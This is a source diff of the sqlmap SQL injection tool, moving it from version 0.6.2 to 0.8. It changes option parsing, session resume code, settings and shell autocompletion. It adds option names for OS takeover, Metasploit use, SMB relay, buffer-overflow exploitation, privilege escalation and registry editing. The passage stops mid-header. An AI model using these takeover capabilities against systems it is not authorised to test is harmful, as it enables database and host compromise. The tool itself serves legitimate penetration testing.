+    kb.headersCount   = 0
+    kb.headersFp      = {}
    kb.htmlFp         = []
    kb.injParameter   = None
    kb.injPlace       = None
    kb.injType        = None
+
+    # Back-end DBMS underlying operating system fingerprint via banner (-b)
+    # parsing
+    kb.os             = None
+    kb.osVersion      = None
+    kb.osSP           = None
+
    kb.parenthesis    = None
    kb.resumedQueries = {}
+    kb.stackedTest    = None
    kb.targetUrls     = set()
+    kb.timeTest       = None
    kb.unionComment   = ""
    kb.unionCount     = None
    kb.unionPosition  = None

-
 def __saveCmdline():
    """
    Saves the command line options on a sqlmap configuration INI file
@@ -467,6 +1021,7 @@ def __saveCmdline():
    debugMsg = "saving command line options on a sqlmap configuration INI file"
    logger.debug(debugMsg)

+    config   = ConfigParser()
    userOpts = {}

    for family in optDict.keys():
@@ -477,52 +1032,51 @@ def __saveCmdline():
            if option in optionData:
                userOpts[family].append((option, value, optionData[option]))

-    confFP = open(paths.SQLMAP_CONFIG, "w")
-
    for family, optionData in userOpts.items():
-        confFP.write("[%s]\n" % family)
+        config.add_section(family)

        optionData.sort()

        for option, value, datatype in optionData:
-            if value == None:
+            if value is None:
                if datatype == "boolean":
                    value = "False"
-                elif datatype == "integer":
-                    if option == "threads":
+                elif datatype in ( "integer", "float" ):
+                    if option in ( "threads", "verbose" ):
                        value = "1"
+                    elif option == "timeout":
+                        value = "10"
                    else:
                        value = "0"
                elif datatype == "string":
                    value = ""

-            confFP.write("%s = %s\n" % (option, value))
+            if isinstance(value, str):
+                value = value.replace("\n", "\n ")

-        confFP.write("\n")
+            config.set(family, option, value)

-    confFP.flush()
-    confFP.close()
+    confFP = open(paths.SQLMAP_CONFIG, "wb")
+    config.write(confFP)

    infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
    logger.info(infoMsg)

-
 def __setVerbosity():
    """
    This function set the verbosity of sqlmap output messages.
    """

-    if not conf.verbose:
-        conf.verbose = 0
-        return
+    if conf.verbose is None:
+        conf.verbose = 1

    conf.verbose = int(conf.verbose)

-    if conf.verbose <= 1:
-        logger.setLevel(logging.INFO)
-    elif conf.verbose > 1 and conf.eta:
-        conf.verbose = 1
+    if conf.verbose == 1:
        logger.setLevel(logging.INFO)
+    elif conf.verbose > 2 and conf.eta:
+        conf.verbose = 2
+        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 2:
        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 3:
@@ -530,7 +1084,6 @@ def __setVerbosity():
    elif conf.verbose >= 4:
        logger.setLevel(8)

-
 def __mergeOptions(inputOptions):
    """
    Merge command line options with configuration file options.
@@ -542,10 +1095,14 @@ def __mergeOptions(inputOptions):
    if inputOptions.configFile:
        configFileParser(inputOptions.configFile)

-    for key, value in inputOptions.__dict__.items():
-        if not conf.has_key(key) or conf[key] == None or value != None:
-            conf[key] = value
+    if hasattr(inputOptions, "items"):
+        inputOptionsItems = inputOptions.items()
+    else:
+        inputOptionsItems = inputOptions.__dict__.items()

+    for key, value in inputOptionsItems:
+        if not conf.has_key(key) or conf[key] is None or value is not None:
+            conf[key] = value

 def init(inputOptions=advancedDict()):
    """
@@ -559,15 +1116,27 @@ def init(inputOptions=advancedDict()):
    __setConfAttributes()
    __setKnowledgeBaseAttributes()
    __cleanupOptions()
+
+    __setRequestFromFile()
+    
+    parseTargetUrl()
+
+    __setHTTPTimeout()
    __setHTTPCookies()
    __setHTTPReferer()
    __setHTTPUserAgent()
+    __setHTTPExtraHeaders()
    __setHTTPMethod()
    __setHTTPAuthentication()
    __setHTTPProxy()
    __setThreads()
-    __setRemoteDBMS()
+    __setDBMS()
+    __setOS()
+    __setUnionTech()
+    __setWriteFile()
+    __setMetasploit()
    __setGoogleDorking()
+    __setMultipleTargets()
    __urllib2Opener()

    update()
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,39 +22,68 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 optDict = {
-            # Family:        { "parameter_name":    "parameter_datatype",
-            "Request":       {
+            # Family:        { "parameter_name":    "parameter_datatype" },
+            "Target":        {
                               "url":               "string",
+                               "list":              "string",
+                               "requestFile":       "string",
                               "googleDork":        "string",
-                               "testParameter":     "string",
+                               "configFile":        "string"
+                             },
+
+            "Request":       {
                               "method":            "string",
                               "data":              "string",
                               "cookie":            "string",
+                               "cookieUrlencode":   "boolean",
+                               "dropSetCookie":     "boolean",
                               "referer":           "string",
                               "agent":             "string",
                               "userAgentsFile":    "string",
+                               "headers":           "string",
                               "aType":             "string",
                               "aCred":             "string",
+                               "aCert":             "string",
                               "proxy":             "string",
+                               "ignoreProxy":       "boolean",
                               "threads":           "integer",
+                               "delay":             "float",
+                               "timeout":           "float",
+                               "retries":           "integer",
+                               "scope":             "string"
                             },

            "Injection":     {
-                               "string":            "string",
+                               "testParameter":     "string",
                               "dbms":              "string",
+                               "os":                "string",
+                               "prefix":            "string",
+                               "postfix":           "string",
+                               "string":            "string",
+                               "regexp":            "string",
+                               "eString":           "string",
+                               "eRegexp":           "string",
+                             },
+
+            "Techniques":    {
+                               "stackedTest":       "boolean",
+                               "timeTest":          "boolean",
+                               "timeSec":           "integer",
+                               "unionTest":         "boolean",
+                               "uTech":             "string",
+                               "unionUse":          "boolean"
                             },

            "Fingerprint":   {
-                               "extensiveFp":       "boolean",
+                               "extensiveFp":       "boolean"
                             },

            "Enumeration":   {
                               "getBanner":         "boolean",
                               "getCurrentUser":    "boolean",
                               "getCurrentDb":      "boolean",
+                               "isDba":             "boolean",
                               "getUsers":          "boolean",
                               "getPasswordHashes": "boolean",
                               "getPrivileges":     "boolean",
@@ -70,26 +99,52 @@ optDict = {
                               "excludeSysDbs":     "boolean",
                               "limitStart":        "integer",
                               "limitStop":         "integer",
+                               "firstChar":         "integer",
+                               "lastChar":          "integer",
                               "query":             "string",
-                               "sqlShell":          "boolean",
+                               "sqlShell":          "boolean"
+                             },
+
+            "User-defined function": {
+                               "udfInject":         "boolean",
+                               "shLib":             "string"
                             },

            "File system":   {
                               "rFile":             "string",
                               "wFile":             "string",
+                               "dFile":             "string"
                             },

            "Takeover":      {
+                               "osCmd":             "string",
                               "osShell":           "boolean",
+                               "osPwn":             "boolean",
+                               "osSmb":             "boolean",
+                               "osBof":             "boolean",
+                               "privEsc":           "boolean",
+                               "msfPath":           "string",
+                               "tmpPath":           "string"
+                             },
+
+            "Windows":       {
+                               "regRead":           "boolean",
+                               "regAdd":            "boolean",
+                               "regDel":            "boolean",
+                               "regKey":            "string",
+                               "regVal":            "string",
+                               "regData":           "string",
+                               "regType":           "string"
                             },

            "Miscellaneous": {
-                               "unionTest":         "boolean",
-                               "unionUse":          "boolean",
-                               "eta":               "boolean",
-                               "verbose":           "integer",
-                               "updateAll":         "boolean",
                               "sessionFile":       "string",
+                               "flushSession":      "boolean",
+                               "eta":               "boolean",
+                               "googlePage":        "integer",
+                               "updateAll":         "boolean",
                               "batch":             "boolean",
+                               "cleanup":           "boolean",
+                               "verbose":           "integer"
                             },
          }
--- a/lib/core/progress.py
+++ b/lib/core/progress.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,27 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.core.common import dataToStdout
-
+from lib.core.data import conf

 class ProgressBar:
    """
    This class defines methods to update and draw a progress bar
    """

-    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
+    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
        self.__progBar = "[]"
        self.__oldProgBar = ""
-        self.__min = minValue
-        self.__max = maxValue
-        self.__span = maxValue - minValue
-        self.__width = totalWidth
+        self.__min = int(minValue)
+        self.__max = int(maxValue)
+        self.__span = self.__max - self.__min
+        self.__width = totalWidth if totalWidth else conf.progressWidth
        self.__amount = 0
        self.update()

-
    def __convertSeconds(self, value):
        seconds = value
        minutes = seconds / 60
@@ -50,7 +47,6 @@ class ProgressBar:

        return "%.2d:%.2d" % (minutes, seconds)

-
    def update(self, newAmount=0):
        """
        This method updates the progress bar
@@ -87,7 +83,6 @@ class ProgressBar:
        percentString = str(percentDone) + "%"
        self.__progBar = "%s %s" % (percentString, self.__progBar)

-
    def draw(self, eta=0):
        """
        This method draws the progress bar if it has changed
@@ -102,7 +97,6 @@ class ProgressBar:
                blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max)))
                dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank))

-
    def __str__(self):
        """
        This method returns the progress bar string
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -27,13 +27,11 @@ In addition to normal readline stuff, this module provides haveReadline
 boolean and _outputfile variable used in genutils.
 """

-
-
 import sys

-
 from lib.core.data import logger
-
+from lib.core.settings import IS_WIN
+from lib.core.settings import PLATFORM

 try:
    from readline import *
@@ -49,7 +47,7 @@ except ImportError:
    except ImportError:    
        haveReadline = False

-if sys.platform == 'win32' and haveReadline:
+if IS_WIN and haveReadline:
    try:
        _outputfile=_rl.GetOutputFile()
    except AttributeError:
@@ -63,7 +61,7 @@ if sys.platform == 'win32' and haveReadline:
 # Thanks to Boyd Waters for this patch.
 uses_libedit = False

-if sys.platform == 'darwin' and haveReadline:
+if PLATFORM == 'darwin' and haveReadline:
    import commands

    (status, result) = commands.getstatusoutput( "otool -L %s | grep libedit" % _rl.__file__ )
@@ -78,7 +76,6 @@ if sys.platform == 'darwin' and haveReadline:

        uses_libedit = True

-
 # the clear_history() function was only introduced in Python 2.4 and is
 # actually optional in the readline API, so we must explicitly check for its
 # existence.  Some known platforms actually don't have it.  This thread:
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,17 +22,18 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import re

 from lib.core.common import dataToSessionFile
+from lib.core.common import formatFingerprintString
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES

 def setString():
    """
@@ -47,6 +48,28 @@ def setString():
    if condition:
        dataToSessionFile("[%s][None][None][String][%s]\n" % (conf.url, conf.string))

+def setRegexp():
+    """
+    Save regular expression to match in session file.
+    """
+
+    condition = (
+                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
+                  not kb.resumedQueries[conf.url].has_key("Regular expression") )
+                )
+
+    if condition:
+        dataToSessionFile("[%s][None][None][Regular expression][%s]\n" % (conf.url, conf.regexp))
+
+def setMatchRatio():
+    condition = (
+                  not kb.resumedQueries
+                  or ( kb.resumedQueries.has_key(conf.url) and
+                  not kb.resumedQueries[conf.url].has_key("Match ratio") )
+                )
+
+    if condition:
+        dataToSessionFile("[%s][None][None][Match ratio][%s]\n" % (conf.url, conf.matchRatio))

 def setInjection():
    """
@@ -71,7 +94,6 @@ def setInjection():
        dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injParameter))
        dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injType))

-
 def setParenthesis(parenthesisCount):
    """
    @param parenthesisCount: number of parenthesis to be set into the
@@ -89,7 +111,6 @@ def setParenthesis(parenthesisCount):

    kb.parenthesis = parenthesisCount

-
 def setDbms(dbms):
    """
    @param dbms: database management system to be set into the knowledge
@@ -106,8 +127,10 @@ def setDbms(dbms):
    if condition:
        dataToSessionFile("[%s][%s][%s][DBMS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], dbms))

-    firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                               "|".join([alias for alias in MYSQL_ALIASES]))
+    firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                     "|".join([alias for alias in MYSQL_ALIASES]),
+                                     "|".join([alias for alias in PGSQL_ALIASES]),
+                                     "|".join([alias for alias in ORACLE_ALIASES]))
    dbmsRegExp = re.search("^%s" % firstRegExp, dbms, re.I)

    if dbmsRegExp:
@@ -115,6 +138,66 @@ def setDbms(dbms):

    kb.dbms = dbms

+    logger.info("the back-end DBMS is %s" % kb.dbms)
+
+def setOs():
+    """
+    Example of kb.bannerFp dictionary:
+
+    {
+      'sp': set(['Service Pack 4']),
+      'dbmsVersion': '8.00.194',
+      'dbmsServicePack': '0',
+      'distrib': set(['2000']),
+      'dbmsRelease': '2000',
+      'type': set(['Windows'])
+    }
+    """
+
+    infoMsg   = ""
+    condition = (
+                  not kb.resumedQueries
+                  or ( kb.resumedQueries.has_key(conf.url) and
+                  not kb.resumedQueries[conf.url].has_key("OS") )
+                )
+
+    if not kb.bannerFp:
+        return
+
+    if "type" in kb.bannerFp:
+        kb.os   = formatFingerprintString(kb.bannerFp["type"])
+        infoMsg = "the back-end DBMS operating system is %s" % kb.os
+
+    if "distrib" in kb.bannerFp:
+        kb.osVersion = formatFingerprintString(kb.bannerFp["distrib"])
+        infoMsg     += " %s" % kb.osVersion
+
+    if "sp" in kb.bannerFp:
+        kb.osSP = int(formatFingerprintString(kb.bannerFp["sp"]).replace("Service Pack ", ""))
+
+    elif "sp" not in kb.bannerFp and kb.os == "Windows":
+        kb.osSP = 0
+
+    if kb.os and kb.osVersion and kb.osSP:
+        infoMsg += " Service Pack %d" % kb.osSP
+
+    if infoMsg:
+        logger.info(infoMsg)
+
+    if condition:
+        dataToSessionFile("[%s][%s][%s][OS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.os))
+
+def setStacked():
+    condition = (
+                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
+                  not kb.resumedQueries[conf.url].has_key("Stacked queries") )
+                )
+
+    if not isinstance(kb.stackedTest, str):
+        return
+
+    if condition:
+        dataToSessionFile("[%s][%s][%s][Stacked queries][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.stackedTest))

 def setUnion(comment=None, count=None, position=None):
    """
@@ -155,6 +238,14 @@ def setUnion(comment=None, count=None, position=None):

        kb.unionPosition = position

+def setRemoteTempPath():
+    condition = (
+                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
+                  not kb.resumedQueries[conf.url].has_key("Remote temp path") )
+                )
+
+    if condition:
+        dataToSessionFile("[%s][%s][%s][Remote temp path][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], conf.tmpPath))

 def resumeConfKb(expression, url, value):
    if expression == "String" and url == conf.url:
@@ -178,6 +269,36 @@ def resumeConfKb(expression, url, value):
            if not test or test[0] in ("y", "Y"):
                conf.string = string

+    elif expression == "Regular expression" and url == conf.url:
+        regexp = value[:-1]
+
+        logMsg  = "resuming regular expression match '%s' from session file" % regexp
+        logger.info(logMsg)
+
+        if regexp and ( not conf.regexp or regexp != conf.regexp ):
+            if not conf.regexp:
+                message  = "you did not provide any regular expression "
+                message += "to match. "
+            else:
+                message  = "The regular expression you provided does not "
+                message += "match the resumed regular expression. "
+
+            message += "Do you want to use the resumed regular expression "
+            message += "to be matched in page when the query "
+            message += "is valid? [Y/n] "
+            test = readInput(message, default="Y")
+
+            if not test or test[0] in ("y", "Y"):
+                conf.regexp = regexp
+
+    elif expression == "Match ratio" and url == conf.url:
+        matchRatio = value[:-1]
+
+        logMsg  = "resuming match ratio '%s' from session file" % matchRatio
+        logger.info(logMsg)
+
+        conf.matchRatio = round(float(matchRatio), 3)
+
    elif expression == "Injection point" and url == conf.url:
        injPlace = value[:-1]

@@ -228,19 +349,22 @@ def resumeConfKb(expression, url, value):

    elif expression == "DBMS" and url == conf.url:
        dbms        = value[:-1]
+        dbms        = dbms.lower()
+        dbmsVersion = None

        logMsg  = "resuming back-end DBMS '%s' " % dbms
        logMsg += "from session file"
        logger.info(logMsg)

-        dbms = dbms.lower()
-        firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                                   "|".join([alias for alias in MYSQL_ALIASES]))
+        firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                         "|".join([alias for alias in MYSQL_ALIASES]),
+                                         "|".join([alias for alias in PGSQL_ALIASES]),
+                                         "|".join([alias for alias in ORACLE_ALIASES]))
        dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, dbms)

        if dbmsRegExp:
            dbms        = dbmsRegExp.group(1)
-            kb.dbmsVersion = [dbmsRegExp.group(2)]
+            dbmsVersion = [ dbmsRegExp.group(2) ]

        if conf.dbms and conf.dbms.lower() != dbms:
            message  = "you provided '%s' as back-end DBMS, " % conf.dbms
@@ -252,8 +376,38 @@ def resumeConfKb(expression, url, value):

            if not test or test[0] in ("n", "N"):
                conf.dbms      = dbms
+                kb.dbmsVersion = dbmsVersion
        else:
            conf.dbms      = dbms
+            kb.dbmsVersion = dbmsVersion
+
+    elif expression == "OS" and url == conf.url:
+        os = value[:-1]
+
+        logMsg  = "resuming back-end DBMS operating system '%s' " % os
+        logMsg += "from session file"
+        logger.info(logMsg)
+
+        if conf.os and conf.os.lower() != os.lower():
+            message  = "you provided '%s' as back-end DBMS operating " % conf.os
+            message += "system, but from a past scan information on the "
+            message += "target URL sqlmap assumes the back-end DBMS "
+            message += "operating system is %s. " % os
+            message += "Do you really want to force the back-end DBMS "
+            message += "OS value? [y/N] "
+            test = readInput(message, default="N")
+
+            if not test or test[0] in ("n", "N"):
+                conf.os = os
+        else:
+            conf.os = os
+
+    elif expression == "Stacked queries" and url == conf.url:
+        kb.stackedTest = value[:-1]
+
+        logMsg  = "resuming stacked queries syntax "
+        logMsg += "'%s' from session file" % kb.stackedTest
+        logger.info(logMsg)

    elif expression == "Union comment" and url == conf.url:
        kb.unionComment = value[:-1]
@@ -275,3 +429,10 @@ def resumeConfKb(expression, url, value):
        logMsg  = "resuming union position "
        logMsg += "%s from session file" % kb.unionPosition
        logger.info(logMsg)
+
+    elif expression == "Remote temp path" and url == conf.url:
+        conf.tmpPath = value[:-1]
+
+        logMsg  = "resuming remote absolute path of temporary "
+        logMsg += "files directory '%s' from session file" % conf.tmpPath
+        logger.info(logMsg)
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,21 +22,20 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import logging
-import os
+import subprocess
 import sys

-
 # sqlmap version and site
-VERSION            = "0.6.2"
+VERSION            = "0.8"
 VERSION_STRING     = "sqlmap/%s" % VERSION
+DESCRIPTION        = "automatic SQL injection and database takeover tool"
 SITE               = "http://sqlmap.sourceforge.net"

 # sqlmap logger
 logging.addLevelName(9, "TRAFFIC OUT")
 logging.addLevelName(8, "TRAFFIC IN")
+
 LOGGER             = logging.getLogger("sqlmapLog")
 LOGGER_HANDLER     = logging.StreamHandler(sys.stdout)
 FORMATTER          = logging.Formatter("[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")
@@ -45,18 +44,19 @@ LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
 LOGGER.setLevel(logging.WARN)

+# System variables
+IS_WIN             = subprocess.mswindows
+PLATFORM           = sys.platform.lower()
+PYVERSION          = sys.version.split()[0]
+
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"

-# Url to update sqlmap from
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
-SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-
 # Database managemen system specific variables
 MSSQL_SYSTEM_DBS   = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
 MYSQL_SYSTEM_DBS   = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"
-PGSQL_SYSTEM_DBS  = ( "information_schema", "pg_catalog" )
-ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" )
+PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog", "pg_toast" )
+ORACLE_SYSTEM_DBS  = ( "SYSTEM", "SYSAUX" )                              # These are TABLESPACE_NAME

 MSSQL_ALIASES      = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
 MYSQL_ALIASES      = [ "mysql", "my" ]
@@ -64,3 +64,49 @@ PGSQL_ALIASES     = [ "postgresql", "postgres", "pgsql", "psql", "pg" ]
 ORACLE_ALIASES     = [ "oracle", "orcl", "ora", "or" ]

 SUPPORTED_DBMS     = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
+SUPPORTED_OS       = ( "linux", "windows" )
+
+SQL_STATEMENTS     = {
+                       "SQL SELECT statement":  (
+                             "select ",
+                             "show ",
+                             " top ",
+                             " distinct ",
+                             " from ",
+                             " from dual",
+                             " where ",
+                             " group by ",
+                             " order by ",
+                             " having ",
+                             " limit ",
+                             " offset ",
+                             " union all ",
+                             " rownum as ",
+                             "(case ",         ),
+
+                       "SQL data definition":   (
+                             "create ",
+                             "declare ",
+                             "drop ",
+                             "truncate ",
+                             "alter ",         ),
+
+                       "SQL data manipulation": (
+                             "insert ",
+                             "update ",
+                             "delete ",
+                             "merge ",         ),
+
+                       "SQL data control":      (
+                             "grant ",         ),
+
+                       "SQL data execution":    (
+                             "execute ",       ),
+
+                       "SQL transaction":       (
+                             "start transaction ",
+                             "begin work ",
+                             "begin transaction ",
+                             "commit ",
+                             "rollback ",      ),
+                     }
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import atexit
 import os
 import rlcompleter
@@ -33,19 +31,16 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.core.data import queries

-
 def saveHistory():
    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
    readline.write_history_file(historyPath)

-
 def loadHistory():
    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)

    if os.path.exists(historyPath):
        readline.read_history_file(historyPath)

-
 def queriesForAutoCompletion():
    autoComplQueries = {}

@@ -54,12 +49,13 @@ def queriesForAutoCompletion():
            autoComplQuery = query
        elif isinstance(query, dict) and "inband" in query:
            autoComplQuery = query["inband"]["query"]
+        else:
+            continue

        autoComplQueries[autoComplQuery] = None

    return autoComplQueries

-
 class CompleterNG(rlcompleter.Completer):
    def global_matches(self, text):
        """
@@ -71,14 +67,13 @@ class CompleterNG(rlcompleter.Completer):
        matches = []
        n = len(text)

-        for list in [ self.namespace ]:
-            for word in list:
+        for ns in [ self.namespace ]:
+            for word in ns:
                if word[:n] == text:
                    matches.append(word)

        return matches

-
 def autoCompletion(sqlShell=False, osShell=False):
    # First of all we check if the readline is available, by default
    # it is not in Python default installation on Windows
@@ -88,12 +83,22 @@ def autoCompletion(sqlShell=False, osShell=False):
    if sqlShell:
        completer = CompleterNG(queriesForAutoCompletion())
    elif osShell:
-        # TODO: add more operating system commands; differentiate commands
-        # based on future operating system fingerprint
+        if kb.os == "Windows":
+            # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
            completer = CompleterNG({
-                                  "id": None, "ifconfig": None, "ls": None,
-                                  "netstat -natu": None, "pwd": None,
-                                  "uname": None, "whoami": None,
+                                      "copy": None, "del": None, "dir": None,
+                                      "echo": None, "md": None, "mem": None,
+                                      "move": None, "net": None, "netstat -na": None,
+                                      "ver": None, "xcopy": None, "whoami": None,
+                                    })
+
+        else:
+            # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
+            completer = CompleterNG({
+                                      "cp": None, "rm": None, "ls": None, 
+                                      "echo": None, "mkdir": None, "free": None,
+                                      "mv": None, "ifconfig": None, "netstat -natu": None,
+                                      "pwd": None, "uname": None, "id": None,
                                    })

    readline.set_completer(completer.complete)
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -0,0 +1,88 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import errno
+import os
+import sys
+import time
+
+from lib.core.settings import IS_WIN
+
+if not IS_WIN:
+    import fcntl
+
+    if (sys.hexversion >> 16) >= 0x202:
+        FCNTL = fcntl
+    else:
+        import FCNTL
+
+def blockingReadFromFD(fd):
+    # Quick twist around original Twisted function
+    # Blocking read from a non-blocking file descriptor
+    output = ""
+
+    while True:
+        try:
+            output += os.read(fd, 8192)
+        except (OSError, IOError), ioe:
+            if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
+                # Uncomment the following line if the process seems to
+                # take a huge amount of cpu time
+                # time.sleep(0.01)
+                continue 
+            else:
+                raise
+        break
+
+    if not output:
+        raise EOFError, "fd %s has been closed." % fd 
+
+    return output
+
+def blockingWriteToFD(fd, data):
+    # Another quick twist
+    while True:
+        try:
+            data_length = len(data)
+            wrote_data  = os.write(fd, data)
+        except (OSError, IOError), io:
+            if io.errno in (errno.EAGAIN, errno.EINTR):
+                continue    
+            else:
+                raise 
+
+        if wrote_data < data_length:
+            blockingWriteToFD(fd, data[wrote_data:])
+
+        break
+
+def setNonBlocking(fd):
+    """
+    Make a file descriptor non-blocking
+    """
+
+    if IS_WIN is not True:
+        flags = fcntl.fcntl(fd, FCNTL.F_GETFL)
+        flags = flags | os.O_NONBLOCK
+        fcntl.fcntl(fd, FCNTL.F_SETFL, flags)
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
